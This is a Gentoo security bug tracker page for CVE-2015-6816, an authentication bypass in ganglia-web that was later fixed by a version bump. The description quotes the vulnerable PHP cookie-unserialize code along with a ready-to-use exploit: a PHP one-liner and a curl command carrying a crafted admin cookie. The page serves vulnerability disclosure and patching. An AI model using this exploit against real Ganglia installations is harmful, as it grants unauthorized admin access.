Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 559658 (CVE-2015-6816) - <sys-cluster/ganglia-web-3.7.3: auth bypass
Summary: <sys-cluster/ganglia-web-3.7.3: auth bypass
Status: RESOLVED FIXED
Alias: CVE-2015-6816
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: Normal minor
Deadline: 2018-03-23
Assignee: Gentoo Security
URL: http://www.openwall.com/lists/oss-sec...
Whiteboard: B3 [noglsa cve]
Keywords:
Depends on:
Blocks:
 
Reported: 2015-09-05 11:59 UTC by Agostino Sarubbo
Modified: 2018-03-28 22:10 UTC (History)
4 users (show)

See Also:
Package list:
Runtime testing required: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Agostino Sarubbo gentoo-dev 2015-09-05 11:59:04 UTC 
From ${URL} :

It's easy to bypass auth by using boolean serialization like this:
$ php -r "echo urlencode(serialize(array('user'=>'admin',
'group'=>'admin', 'token'=>true)));"

Vulnerable code listed below:
https://github.com/ganglia/ganglia-web/blob/4e98ea69e0e18b388cdc73809ce54843a16ff87b/lib/GangliaAuth.php#L34-L46

if(isSet($_COOKIE['ganglia_auth'])) {
  $cookie = $_COOKIE['ganglia_auth'];
  // magic quotes will break unserialization
  if($this->getMagicQuotesGpc()) {
    $cookie = stripslashes($cookie);
  }
  $data = unserialize($cookie);
  if(array_keys($data) != array('user','group','token')) {
    return false;
  }
  if($this->getAuthToken($data['user']) == $data['token']) {

// Found by d90.andrew
// Exploit: curl -H 'Cookie:
a%3A3%3A%7Bs%3A4%3A%22user%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22group%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22token%22%3Bb%3A1%3B%7D'
http://ganglia.local/ganglia/



@maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
Comment 1 Thomas Deutschmann (RETIRED) gentoo-dev 2017-01-09 19:21:51 UTC 
Upstream bug: https://github.com/ganglia/ganglia-web/issues/267

Upstream patch: https://github.com/ganglia/ganglia-web/commit/f8cc17054270d54f53d92bbe3f7764dc3d9efcc7


@ Maintainer(s): Please bump to >=sys-cluster/ganglia-web-3.7.1
Comment 2 Thomas Deutschmann (RETIRED) gentoo-dev 2018-02-23 15:13:11 UTC 
PMASKED for removal via https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=66a3c8edba15cb0eccf125b74250f1baeeab15d1
Comment 3 Daniel M. Weeks 2018-03-21 17:16:52 UTC 
I have had updated versions of this package in my junkdrawer overlay for more than a year. I'm interested in proxy maintaining it so it doesn't get removed.
Comment 4 Pacho Ramos gentoo-dev 2018-03-21 17:58:10 UTC 
I will CC proxy-maint people then. Anyway, sending a pull request will probably speed up things over telling them to look at your overlay I think :/
https://wiki.gentoo.org/wiki/Project:Proxy_Maintainers
Comment 5 Larry the Git Cow gentoo-dev 2018-03-28 14:25:49 UTC 
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=144acff1e4c6db1ba4823bf35c820acd0570d903

commit 144acff1e4c6db1ba4823bf35c820acd0570d903
Author:     Daniel M. Weeks <dan@danweeks.net>
AuthorDate: 2018-03-24 16:45:31 +0000
Commit:     Justin Bronder <jsbronder@gentoo.org>
CommitDate: 2018-03-28 14:25:08 +0000

    sys-cluster/ganglia-web: version bump 3.7.3
    
    Bug: https://bugs.gentoo.org/592080
    Bug: https://bugs.gentoo.org/559658
    Package-Manager: Portage-2.3.24, Repoman-2.3.6

 sys-cluster/ganglia-web/Manifest                 |  1 +
 sys-cluster/ganglia-web/ganglia-web-3.7.3.ebuild | 49 ++++++++++++++++++++++++
 2 files changed, 50 insertions(+)}
Comment 6 Justin Bronder (RETIRED) gentoo-dev 2018-03-28 14:52:27 UTC 
Fixed by Daniel.  Thanks!
Comment 7 Justin Bronder (RETIRED) gentoo-dev 2018-03-28 14:53:06 UTC 
Oops, shouldn't have closed.  Sorry security team.
Comment 8 Aaron Bauman (RETIRED) gentoo-dev 2018-03-28 22:10:16 UTC 
GLSA Vote: No

Tree is clean.

Thanks!